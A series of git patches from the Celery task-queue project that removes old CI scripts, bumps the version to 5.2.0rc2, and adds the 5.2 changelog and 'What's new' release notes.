diff --git a/extra/appveyor/run_with_compiler.cmd b/extra/appveyor/run_with_compiler.cmd
deleted file mode 100644
index 31bd205ecbb..00000000000
--- a/extra/appveyor/run_with_compiler.cmd
+++ /dev/null
@@ -1,47 +0,0 @@
-:: To build extensions for 64 bit Python 3, we need to configure environment
-:: variables to use the MSVC 2010 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 4 (SDK v7.1)
-::
-:: To build extensions for 64 bit Python 2, we need to configure environment
-:: variables to use the MSVC 2008 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 3.5 (SDK v7.0)
-::
-:: 32 bit builds do not require specific environment configurations.
-::
-:: Note: this script needs to be run with the /E:ON and /V:ON flags for the
-:: cmd interpreter, at least for (SDK v7.0)
-::
-:: More details at:
-:: https://github.com/cython/cython/wiki/64BitCythonExtensionsOnWindows
-:: https://stackoverflow.com/a/13751649/163740
-::
-:: Author: Olivier Grisel
-:: License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-@ECHO OFF
-
-SET COMMAND_TO_RUN=%*
-SET WIN_SDK_ROOT=C:\Program Files\Microsoft SDKs\Windows
-
-SET MAJOR_PYTHON_VERSION="%PYTHON_VERSION:~0,1%"
-IF %MAJOR_PYTHON_VERSION% == "2" (
- SET WINDOWS_SDK_VERSION="v7.0"
-) ELSE IF %MAJOR_PYTHON_VERSION% == "3" (
- SET WINDOWS_SDK_VERSION="v7.1"
-) ELSE (
- ECHO Unsupported Python version: "%MAJOR_PYTHON_VERSION%"
- EXIT 1
-)
-
-IF "%PYTHON_ARCH%"=="64" (
- ECHO Configuring Windows SDK %WINDOWS_SDK_VERSION% for Python %MAJOR_PYTHON_VERSION% on a 64 bit architecture
- SET DISTUTILS_USE_SDK=1
- SET MSSdk=1
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Setup\WindowsSdkVer.exe" -q -version:%WINDOWS_SDK_VERSION%
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Bin\SetEnv.cmd" /x64 /release
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-) ELSE (
- ECHO Using default MSVC build environment for 32 bit architecture
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-)
From 9f649b44f699a15a5cb27e738cbef9975f581fe8 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:41:28 +0600
Subject: [PATCH 100/177] not used anymore
---
extra/travis/is-memcached-running | 11 -----------
1 file changed, 11 deletions(-)
delete mode 100755 extra/travis/is-memcached-running
diff --git a/extra/travis/is-memcached-running b/extra/travis/is-memcached-running
deleted file mode 100755
index 004608663c2..00000000000
--- a/extra/travis/is-memcached-running
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/usr/bin/expect -f
-# based on https://stackoverflow.com/a/17265696/833093
-
-set destination [lindex $argv 0]
-set port [lindex $argv 1]
-
-spawn nc $destination $port
-send stats\r
-expect "END"
-send quit\r
-expect eof
From 8570b1658a1842c3e3534b93a5ad167ca3ec6673 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:45:37 +0600
Subject: [PATCH 101/177] add github discussions forum
---
.github/ISSUE_TEMPLATE/Bug-Report.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/ISSUE_TEMPLATE/Bug-Report.md b/.github/ISSUE_TEMPLATE/Bug-Report.md
index 9659e4c097e..25a9be322a1 100644
--- a/.github/ISSUE_TEMPLATE/Bug-Report.md
+++ b/.github/ISSUE_TEMPLATE/Bug-Report.md
@@ -13,7 +13,7 @@ bug reports which are incomplete.
To check an item on the list replace [ ] with [x].
-->
- [ ] I have verified that the issue exists against the `master` branch of Celery.
-- [ ] This has already been asked to the [discussion group](https://groups.google.com/forum/#!forum/celery-users) first.
+- [ ] This has already been asked to the [discussions forum](https://github.com/celery/celery/discussions) first.
- [ ] I have read the relevant section in the
[contribution guide](http://docs.celeryproject.org/en/latest/contributing.html#other-bugs)
on reporting bugs.
From 0009130c9f40485092a561bf088ee44e6aa254ed Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 2 Nov 2021 13:32:42 +0200
Subject: [PATCH 102/177] =?UTF-8?q?Bump=20version:=205.2.0rc1=20=E2=86=92?=
=?UTF-8?q?=205.2.0rc2?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index e15f3d1d528..e30618d431d 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0rc1
+current_version = 5.2.0rc2
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 9f9ccaaf47c..ca8cafaa771 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0rc1 (dawn-chorus)
+:Version: 5.2.0rc2 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0rc1 runs on,
+Celery version 5.2.0rc2 runs on,
- Python (3.7, 3.8, 3.9, 3.10)
- PyPy3.7 (7.3+)
@@ -90,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0rc1 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0rc2 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index 3757c43a725..0d40be901fe 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0rc1'
+__version__ = '5.2.0rc2'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 7b40123da0a..9ec52bf75db 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0rc1 (cliffs)
+:Version: 5.2.0rc2 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 4033851d4b0076fed314e030fa4e5f3b9e98fef2 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 2 Nov 2021 16:09:05 +0200
Subject: [PATCH 103/177] 5.2 Release (#6939)
* Initial work.
* Add the previous release notes to the index.
* Describe memory leak fixes.
* More release notes...
* More release notes...
* More release notes...
* More release notes...
* More release notes...
* Whats new is now complete.
* Update docs/whatsnew-5.2.rst
Co-authored-by: Matus Valo
* Change IRC channel to libera chat.
* Change IRC channel to libera chat.
* Changelog...
* Beta1 changelog.
* Fix typo: version 5.2, not 5.1
* Add changelog documentation for 5.2.0b2 release
* Add changelog documentation for 5.2.0b3
* Add changelog documentation for 5.2.0rc1
* Add changelog documentation for 5.2.0rc2
* Change release-by to myself
* Update release-date of version 5.2.0rc2 now that it has been released
Co-authored-by: Asif Saif Uddin
Co-authored-by: Matus Valo
Co-authored-by: Naomi Elstein
---
Changelog.rst | 228 ++++++++--------
docs/history/changelog-5.1.rst | 139 ++++++++++
docs/history/index.rst | 2 +
docs/{ => history}/whatsnew-5.1.rst | 0
docs/includes/resources.txt | 4 +-
docs/index.rst | 2 +-
docs/whatsnew-5.2.rst | 386 ++++++++++++++++++++++++++++
7 files changed, 639 insertions(+), 122 deletions(-)
create mode 100644 docs/history/changelog-5.1.rst
rename docs/{ => history}/whatsnew-5.1.rst (100%)
create mode 100644 docs/whatsnew-5.2.rst
diff --git a/Changelog.rst b/Changelog.rst
index 5b724b1536d..d6853d97359 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -5,135 +5,125 @@
================
This document contains change notes for bugfix & new features
-in the & 5.1.x series, please see :ref:`whatsnew-5.1` for
-an overview of what's new in Celery 5.1.
+in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
+an overview of what's new in Celery 5.2.
-.. version-5.1.2:
+.. _version-5.2.0rc2:
-5.1.2
-=====
-:release-date: 2021-06-28 16.15 P.M UTC+3:00
-:release-by: Omer Katz
-
-- When chords fail, correctly call errbacks. (#6814)
-
- We had a special case for calling errbacks when a chord failed which
- assumed they were old style. This change ensures that we call the proper
- errback dispatch method which understands new and old style errbacks,
- and adds test to confirm that things behave as one might expect now.
-- Avoid using the ``Event.isSet()`` deprecated alias. (#6824)
-- Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825)
-
-.. version-5.1.1:
-
-5.1.1
-=====
-:release-date: 2021-06-17 16.10 P.M UTC+3:00
+5.2.0rc2
+=======
+:release-date: 2021-11-02 1.54 P.M UTC+3:00
+:release-by: Naomi Elstein
+
+- Bump Python 3.10.0 to rc2.
+- [pre-commit.ci] pre-commit autoupdate (#6972).
+- autopep8.
+- Prevent worker to send expired revoked items upon hello command (#6975).
+- docs: clarify the 'keeping results' section (#6979).
+- Update deprecated task module removal in 5.0 documentation (#6981).
+- [pre-commit.ci] pre-commit autoupdate.
+- try python 3.10 GA.
+- mention python 3.10 on readme.
+- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
+- Azure blockblob backend parametrized connection/read timeouts (#6978).
+- Add as_uri method to azure block blob backend.
+- Add possibility to override backend implementation with celeryconfig (#6879).
+- [pre-commit.ci] pre-commit autoupdate.
+- try to fix deprecation warning.
+- [pre-commit.ci] pre-commit autoupdate.
+- not needed anyore.
+- not needed anyore.
+- not used anymore.
+- add github discussions forum
+
+.. _version-5.2.0rc1:
+
+5.2.0rc1
+=======
+:release-date: 2021-09-26 4.04 P.M UTC+3:00
:release-by: Omer Katz
-- Fix ``--pool=threads`` support in command line options parsing. (#6787)
-- Fix ``LoggingProxy.write()`` return type. (#6791)
-- Couchdb key is now always coerced into a string. (#6781)
-- grp is no longer imported unconditionally. (#6804)
- This fixes a regression in 5.1.0 when running Celery in non-unix systems.
-- Ensure regen utility class gets marked as done when concertised. (#6789)
-- Preserve call/errbacks of replaced tasks. (#6770)
-- Use single-lookahead for regen consumption. (#6799)
-- Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)
-
-.. version-5.1.0:
-
-5.1.0
-=====
-:release-date: 2021-05-23 19.20 P.M UTC+3:00
+- Kill all workers when main process exits in prefork model (#6942).
+- test kombu 5.2.0rc1 (#6947).
+- try moto 2.2.x (#6948).
+- Prepared Hacker News Post on Release Action.
+- update setup with python 3.7 as minimum.
+- update kombu on setupcfg.
+- Added note about automatic killing all child processes of worker after its termination.
+- [pre-commit.ci] pre-commit autoupdate.
+- Move importskip before greenlet import (#6956).
+- amqp: send expiration field to broker if requested by user (#6957).
+- Single line drift warning.
+- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
+- Allow to enable Events with app.conf mechanism.
+- Warn when expiration date is in the past.
+- Add the Framework :: Celery trove classifier.
+- Give indication whether the task is replacing another (#6916).
+- Make setup.py executable.
+- Bump version: 5.2.0b3 → 5.2.0rc1.
+
+.. _version-5.2.0b3:
+
+5.2.0b3
+=======
+:release-date: 2021-09-02 8.38 P.M UTC+3:00
:release-by: Omer Katz
-- ``celery -A app events -c camera`` now works as expected. (#6774)
-- Bump minimum required Kombu version to 5.1.0.
-
-.. _version-5.1.0rc1:
-
-5.1.0rc1
-========
-:release-date: 2021-05-02 16.06 P.M UTC+3:00
+- Add args to LOG_RECEIVED (fixes #6885) (#6898).
+- Terminate job implementation for eventlet concurrency backend (#6917).
+- Add cleanup implementation to filesystem backend (#6919).
+- [pre-commit.ci] pre-commit autoupdate (#69).
+- Add before_start hook (fixes #4110) (#6923).
+- Restart consumer if connection drops (#6930).
+- Remove outdated optimization documentation (#6933).
+- added https verification check functionality in arangodb backend (#6800).
+- Drop Python 3.6 support.
+- update supported python versions on readme.
+- [pre-commit.ci] pre-commit autoupdate (#6935).
+- Remove appveyor configuration since we migrated to GA.
+- pyugrade is now set to upgrade code to 3.7.
+- Drop exclude statement since we no longer test with pypy-3.6.
+- 3.10 is not GA so it's not supported yet.
+- Celery 5.1 or earlier support Python 3.6.
+- Fix linting error.
+- fix: Pass a Context when chaining fail results (#6899).
+- Bump version: 5.2.0b2 → 5.2.0b3.
+
+.. _version-5.2.0b2:
+
+5.2.0b2
+=======
+:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz
-- Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
-- Error propagation and errback calling for group-like signatures now works as expected. (#6746)
-- Fix sanitization of passwords in sentinel URIs. (#6765)
-- Add LOG_RECEIVED to customize logging. (#6758)
+- Test windows on py3.10rc1 and pypy3.7 (#6868).
+- Route chord_unlock task to the same queue as chord body (#6896).
+- Add message properties to app.tasks.Context (#6818).
+- handle already converted LogLevel and JSON (#6915).
+- 5.2 is codenamed dawn-chorus.
+- Bump version: 5.2.0b1 → 5.2.0b2.
-.. _version-5.1.0b2:
+.. _version-5.2.0b1:
-5.1.0b2
+5.2.0b1
=======
-:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz
-- Fix the behavior of our json serialization which regressed in 5.0. (#6561)
-- Add support for SQLAlchemy 1.4. (#6709)
-- Safeguard against schedule entry without kwargs. (#6619)
-- ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713)
-- Update systemd tmpfiles path. (#6688)
-- Ensure AMQPContext exposes an app attribute. (#6741)
-- Inspect commands accept arguments again (#6710).
-- Chord counting of group children is now accurate. (#6733)
-- Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss`
- to terminate tasks with late acknowledgement on connection loss. (#6654)
-- The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated
- when ``Request.on_failure`` is called. (#6654)
-- Restore pickling support for ``Retry``. (#6748)
-- Add support in the redis result backend for authenticating with a username. (#6750)
-- The :setting:`worker_pool` setting is now respected correctly. (#6711)
-
-.. _version-5.1.0b1:
-
-5.1.0b1
-=======
-:release-date: 2021-04-02 10.25 P.M UTC+6:00
-:release-by: Asif Saif Uddin
-
-- Add sentinel_kwargs to Redis Sentinel docs.
-- Depend on the maintained python-consul2 library. (#6544).
-- Use result_chord_join_timeout instead of hardcoded default value.
-- Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
-- Improved integration tests.
-- pass_context for handle_preload_options decorator (#6583).
-- Makes regen less greedy (#6589).
-- Pytest worker shutdown timeout (#6588).
-- Exit celery with non zero exit value if failing (#6602).
-- Raise BackendStoreError when set value is too large for Redis.
-- Trace task optimizations are now set via Celery app instance.
-- Make trace_task_ret and fast_trace_task public.
-- reset_worker_optimizations and create_request_cls has now app as optional parameter.
-- Small refactor in exception handling of on_failure (#6633).
-- Fix for issue #5030 "Celery Result backend on Windows OS".
-- Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
-- Allow heartbeats to be sent in tests (#6632).
-- Fixed default visibility timeout note in sqs documentation.
-- Support Redis Sentinel with SSL.
-- Simulate more exhaustive delivery info in apply().
-- Start chord header tasks as soon as possible (#6576).
-- Forward shadow option for retried tasks (#6655).
-- --quiet flag now actually makes celery avoid producing logs (#6599).
-- Update platforms.py "superuser privileges" check (#6600).
-- Remove unused property `autoregister` from the Task class (#6624).
-- fnmatch.translate() already translates globs for us. (#6668).
-- Upgrade some syntax to Python 3.6+.
-- Add `azureblockblob_base_path` config (#6669).
-- Fix checking expiration of X.509 certificates (#6678).
-- Drop the lzma extra.
-- Fix JSON decoding errors when using MongoDB as backend (#6675).
-- Allow configuration of RedisBackend's health_check_interval (#6666).
-- Safeguard against schedule entry without kwargs (#6619).
-- Docs only - SQS broker - add STS support (#6693) through kombu.
-- Drop fun_accepts_kwargs backport.
-- Tasks can now have required kwargs at any order (#6699).
-- Min py-amqp 5.0.6.
-- min billiard is now 3.6.4.0.
-- Minimum kombu now is5.1.0b1.
-- Numerous docs fixes.
-- Moved CI to github action.
-- Updated deployment scripts.
-- Updated docker.
-- Initial support of python 3.9 added.
+- Add Python 3.10 support (#6807).
+- Fix docstring for Signal.send to match code (#6835).
+- No blank line in log output (#6838).
+- Chords get body_type independently to handle cases where body.type does not exist (#6847).
+- Fix #6844 by allowing safe queries via app.inspect().active() (#6849).
+- Fix multithreaded backend usage (#6851).
+- Fix Open Collective donate button (#6848).
+- Fix setting worker concurrency option after signal (#6853).
+- Make ResultSet.on_ready promise hold a weakref to self (#6784).
+- Update configuration.rst.
+- Discard jobs on flush if synack isn't enabled (#6863).
+- Bump click version to 8.0 (#6861).
+- Amend IRC network link to Libera (#6837).
+- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
+- Fix inspect --json output to return valid json without --quiet.
+- Remove celery.task references in modules, docs (#6869).
+- The Consul backend must correctly associate requests and responses (#6823).
diff --git a/docs/history/changelog-5.1.rst b/docs/history/changelog-5.1.rst
new file mode 100644
index 00000000000..5b724b1536d
--- /dev/null
+++ b/docs/history/changelog-5.1.rst
@@ -0,0 +1,139 @@
+.. _changelog:
+
+================
+ Change history
+================
+
+This document contains change notes for bugfix & new features
+in the & 5.1.x series, please see :ref:`whatsnew-5.1` for
+an overview of what's new in Celery 5.1.
+
+.. version-5.1.2:
+
+5.1.2
+=====
+:release-date: 2021-06-28 16.15 P.M UTC+3:00
+:release-by: Omer Katz
+
+- When chords fail, correctly call errbacks. (#6814)
+
+ We had a special case for calling errbacks when a chord failed which
+ assumed they were old style. This change ensures that we call the proper
+ errback dispatch method which understands new and old style errbacks,
+ and adds test to confirm that things behave as one might expect now.
+- Avoid using the ``Event.isSet()`` deprecated alias. (#6824)
+- Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825)
+
+.. version-5.1.1:
+
+5.1.1
+=====
+:release-date: 2021-06-17 16.10 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix ``--pool=threads`` support in command line options parsing. (#6787)
+- Fix ``LoggingProxy.write()`` return type. (#6791)
+- Couchdb key is now always coerced into a string. (#6781)
+- grp is no longer imported unconditionally. (#6804)
+ This fixes a regression in 5.1.0 when running Celery in non-unix systems.
+- Ensure regen utility class gets marked as done when concertised. (#6789)
+- Preserve call/errbacks of replaced tasks. (#6770)
+- Use single-lookahead for regen consumption. (#6799)
+- Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)
+
+.. version-5.1.0:
+
+5.1.0
+=====
+:release-date: 2021-05-23 19.20 P.M UTC+3:00
+:release-by: Omer Katz
+
+- ``celery -A app events -c camera`` now works as expected. (#6774)
+- Bump minimum required Kombu version to 5.1.0.
+
+.. _version-5.1.0rc1:
+
+5.1.0rc1
+========
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
+- Error propagation and errback calling for group-like signatures now works as expected. (#6746)
+- Fix sanitization of passwords in sentinel URIs. (#6765)
+- Add LOG_RECEIVED to customize logging. (#6758)
+
+.. _version-5.1.0b2:
+
+5.1.0b2
+=======
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix the behavior of our json serialization which regressed in 5.0. (#6561)
+- Add support for SQLAlchemy 1.4. (#6709)
+- Safeguard against schedule entry without kwargs. (#6619)
+- ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713)
+- Update systemd tmpfiles path. (#6688)
+- Ensure AMQPContext exposes an app attribute. (#6741)
+- Inspect commands accept arguments again (#6710).
+- Chord counting of group children is now accurate. (#6733)
+- Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss`
+ to terminate tasks with late acknowledgement on connection loss. (#6654)
+- The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated
+ when ``Request.on_failure`` is called. (#6654)
+- Restore pickling support for ``Retry``. (#6748)
+- Add support in the redis result backend for authenticating with a username. (#6750)
+- The :setting:`worker_pool` setting is now respected correctly. (#6711)
+
+.. _version-5.1.0b1:
+
+5.1.0b1
+=======
+:release-date: 2021-04-02 10.25 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Add sentinel_kwargs to Redis Sentinel docs.
+- Depend on the maintained python-consul2 library. (#6544).
+- Use result_chord_join_timeout instead of hardcoded default value.
+- Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
+- Improved integration tests.
+- pass_context for handle_preload_options decorator (#6583).
+- Makes regen less greedy (#6589).
+- Pytest worker shutdown timeout (#6588).
+- Exit celery with non zero exit value if failing (#6602).
+- Raise BackendStoreError when set value is too large for Redis.
+- Trace task optimizations are now set via Celery app instance.
+- Make trace_task_ret and fast_trace_task public.
+- reset_worker_optimizations and create_request_cls has now app as optional parameter.
+- Small refactor in exception handling of on_failure (#6633).
+- Fix for issue #5030 "Celery Result backend on Windows OS".
+- Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
+- Allow heartbeats to be sent in tests (#6632).
+- Fixed default visibility timeout note in sqs documentation.
+- Support Redis Sentinel with SSL.
+- Simulate more exhaustive delivery info in apply().
+- Start chord header tasks as soon as possible (#6576).
+- Forward shadow option for retried tasks (#6655).
+- --quiet flag now actually makes celery avoid producing logs (#6599).
+- Update platforms.py "superuser privileges" check (#6600).
+- Remove unused property `autoregister` from the Task class (#6624).
+- fnmatch.translate() already translates globs for us. (#6668).
+- Upgrade some syntax to Python 3.6+.
+- Add `azureblockblob_base_path` config (#6669).
+- Fix checking expiration of X.509 certificates (#6678).
+- Drop the lzma extra.
+- Fix JSON decoding errors when using MongoDB as backend (#6675).
+- Allow configuration of RedisBackend's health_check_interval (#6666).
+- Safeguard against schedule entry without kwargs (#6619).
+- Docs only - SQS broker - add STS support (#6693) through kombu.
+- Drop fun_accepts_kwargs backport.
+- Tasks can now have required kwargs at any order (#6699).
+- Min py-amqp 5.0.6.
+- min billiard is now 3.6.4.0.
+- Minimum kombu now is5.1.0b1.
+- Numerous docs fixes.
+- Moved CI to github action.
+- Updated deployment scripts.
+- Updated docker.
+- Initial support of python 3.9 added.
diff --git a/docs/history/index.rst b/docs/history/index.rst
index 88e30c0a2b0..35423550084 100644
--- a/docs/history/index.rst
+++ b/docs/history/index.rst
@@ -13,6 +13,8 @@ version please visit :ref:`changelog`.
.. toctree::
:maxdepth: 2
+ whatsnew-5.1
+ changelog-5.1
whatsnew-5.0
changelog-5.0
whatsnew-4.4
diff --git a/docs/whatsnew-5.1.rst b/docs/history/whatsnew-5.1.rst
similarity index 100%
rename from docs/whatsnew-5.1.rst
rename to docs/history/whatsnew-5.1.rst
diff --git a/docs/includes/resources.txt b/docs/includes/resources.txt
index 1afe96e546d..07681a464d7 100644
--- a/docs/includes/resources.txt
+++ b/docs/includes/resources.txt
@@ -18,10 +18,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
+Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_
network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://freenode.net
.. _bug-tracker:
diff --git a/docs/index.rst b/docs/index.rst
index 6b93a9d23fc..915b7c088aa 100644
--- a/docs/index.rst
+++ b/docs/index.rst
@@ -58,7 +58,7 @@ Contents
tutorials/index
faq
changelog
- whatsnew-5.1
+ whatsnew-5.2
reference/index
internals/index
history/index
diff --git a/docs/whatsnew-5.2.rst b/docs/whatsnew-5.2.rst
new file mode 100644
index 00000000000..f1f60743cf8
--- /dev/null
+++ b/docs/whatsnew-5.2.rst
@@ -0,0 +1,386 @@
+.. _whatsnew-5.2:
+
+=========================================
+ What's new in Celery 5.2 (Dawn Chorus)
+=========================================
+:Author: Omer Katz (``omer.drow at gmail.com``)
+
+.. sidebar:: Change history
+
+ What's new documents describe the changes in major versions,
+ we also have a :ref:`changelog` that lists the changes in bugfix
+ releases (0.0.x), while older series are archived under the :ref:`history`
+ section.
+
+Celery is a simple, flexible, and reliable distributed programming framework
+to process vast amounts of messages, while providing operations with
+the tools required to maintain a distributed system with python.
+
+It's a task queue with focus on real-time processing, while also
+supporting task scheduling.
+
+Celery has a large and diverse community of users and contributors,
+you should come join us :ref:`on IRC `
+or :ref:`our mailing-list `.
+
+.. note::
+
+ Following the problems with Freenode, we migrated our IRC channel to Libera Chat
+ as most projects did.
+ You can also join us using `Gitter `_.
+
+ We're sometimes there to answer questions. We welcome you to join.
+
+To read more about Celery you should go read the :ref:`introduction `.
+
+While this version is **mostly** backward compatible with previous versions
+it's important that you read the following section as this release
+is a new major version.
+
+This version is officially supported on CPython 3.7 & 3.8 & 3.9
+and is also supported on PyPy3.
+
+.. _`website`: http://celeryproject.org/
+
+.. topic:: Table of Contents
+
+ Make sure you read the important notes before upgrading to this version.
+
+.. contents::
+ :local:
+ :depth: 2
+
+Preface
+=======
+
+.. note::
+
+ **This release contains fixes for two (potentially severe) memory leaks.
+ We encourage our users to upgrade to this release as soon as possible.**
+
+The 5.2.0 release is a new minor release for Celery.
+
+Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_.
+This release has been codenamed `Dawn Chorus `_.
+
+From now on we only support Python 3.7 and above.
+We will maintain compatibility with Python 3.7 until it's
+EOL in June, 2023.
+
+*— Omer Katz*
+
+Long Term Support Policy
+------------------------
+
+We no longer support Celery 4.x as we don't have the resources to do so.
+If you'd like to help us, all contributions are welcome.
+
+Celery 5.x **is not** an LTS release. We will support it until the release
+of Celery 6.x.
+
+We're in the process of defining our Long Term Support policy.
+Watch the next "What's New" document for updates.
+
+Wall of Contributors
+--------------------
+
+.. note::
+
+ This wall was automatically generated from git history,
+ so sadly it doesn't not include the people who help with more important
+ things like answering mailing-list questions.
+
+Upgrading from Celery 4.x
+=========================
+
+Step 1: Adjust your command line invocation
+-------------------------------------------
+
+Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible.
+
+The global options can no longer be positioned after the sub-command.
+Instead, they must be positioned as an option for the `celery` command like so::
+
+ celery --app path.to.app worker
+
+If you were using our :ref:`daemonizing` guide to deploy Celery in production,
+you should revisit it for updates.
+
+Step 2: Update your configuration with the new setting names
+------------------------------------------------------------
+
+If you haven't already updated your configuration when you migrated to Celery 4.0,
+please do so now.
+
+We elected to extend the deprecation period until 6.0 since
+we did not loudly warn about using these deprecated settings.
+
+Please refer to the :ref:`migration guide ` for instructions.
+
+Step 3: Read the important notes in this document
+-------------------------------------------------
+
+Make sure you are not affected by any of the important upgrade notes
+mentioned in the :ref:`following section `.
+
+You should verify that none of the breaking changes in the CLI
+do not affect you. Please refer to :ref:`New Command Line Interface ` for details.
+
+Step 4: Migrate your code to Python 3
+-------------------------------------
+
+Celery 5.x only supports Python 3. Therefore, you must ensure your code is
+compatible with Python 3.
+
+If you haven't ported your code to Python 3, you must do so before upgrading.
+
+You can use tools like `2to3 `_
+and `pyupgrade `_ to assist you with
+this effort.
+
+After the migration is done, run your test suite with Celery 4 to ensure
+nothing has been broken.
+
+Step 5: Upgrade to Celery 5.2
+-----------------------------
+
+At this point you can upgrade your workers and clients with the new version.
+
+.. _v520-important:
+
+Important Notes
+===============
+
+Supported Python Versions
+-------------------------
+
+The supported Python versions are:
+
+- CPython 3.7
+- CPython 3.8
+- CPython 3.9
+- PyPy3.7 7.3 (``pypy3``)
+
+Experimental support
+~~~~~~~~~~~~~~~~~~~~
+
+Celery supports these Python versions provisionally as they are not production
+ready yet:
+
+- CPython 3.10 (currently in RC2)
+
+Memory Leak Fixes
+-----------------
+
+Two severe memory leaks have been fixed in this version:
+
+* :class:`celery.result.ResultSet` no longer holds a circular reference to itself.
+* The prefork pool no longer keeps messages in its cache forever when the master
+ process disconnects from the broker.
+
+The first memory leak occurs when you use :class:`celery.result.ResultSet`.
+Each instance held a promise which provides that instance as an argument to
+the promise's callable.
+This caused a circular reference which kept the ResultSet instance in memory
+forever since the GC couldn't evict it.
+The provided argument is now a :func:`weakref.proxy` of the ResultSet's
+instance.
+The memory leak mainly occurs when you use :class:`celery.result.GroupResult`
+since it inherits from :class:`celery.result.ResultSet` which doesn't get used
+that often.
+
+The second memory leak exists since the inception of the project.
+The prefork pool maintains a cache of the jobs it executes.
+When they are complete, they are evicted from the cache.
+However, when Celery disconnects from the broker, we flush the pool
+and discard the jobs, expecting that they'll be cleared later once the worker
+acknowledges them but that has never been the case.
+Instead, these jobs remain forever in memory.
+We now discard those jobs immediately while flushing.
+
+Dropped support for Python 3.6
+------------------------------
+
+Celery now requires Python 3.7 and above.
+
+Python 3.6 will reach EOL in December, 2021.
+In order to focus our efforts we have dropped support for Python 3.6 in
+this version.
+
+If you still require to run Celery using Python 3.6
+you can still use Celery 5.1.
+However we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 3.6 after
+the 23th of December, 2021.
+
+Tasks
+-----
+
+When replacing a task with another task, we now give an indication of the
+replacing nesting level through the ``replaced_task_nesting`` header.
+
+A task which was never replaced has a ``replaced_task_nesting`` value of 0.
+
+Kombu
+-----
+
+Starting from v5.2, the minimum required version is Kombu 5.2.0.
+
